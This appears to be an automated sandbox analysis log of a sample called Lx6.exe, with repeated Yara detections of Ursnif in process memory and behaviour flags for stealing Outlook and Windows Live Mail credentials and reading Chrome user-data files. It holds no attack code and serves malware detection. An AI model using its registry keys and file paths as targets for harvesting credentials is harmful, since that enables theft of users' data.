Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076B568 cpuid

0_2_0076B568

Source: C:\Users\user\Desktop\Lx6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00401927 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_00401927

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076915C GetUserNameA,GetSystemTimeAsFileTime,HeapFree,

0_2_0076915C

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076D4C8 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

0_2_0076D4C8

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_004019F9 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_004019F9

Stealing of Sensitive Information

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail			Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000e	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000f	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000c	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000d	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_0	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000001	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000002	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000010	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000011	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000005	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000003	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000004	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_1	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000009	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_2	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_3	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000007	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\index	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000008	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000a	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000b	Jump to behavior

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
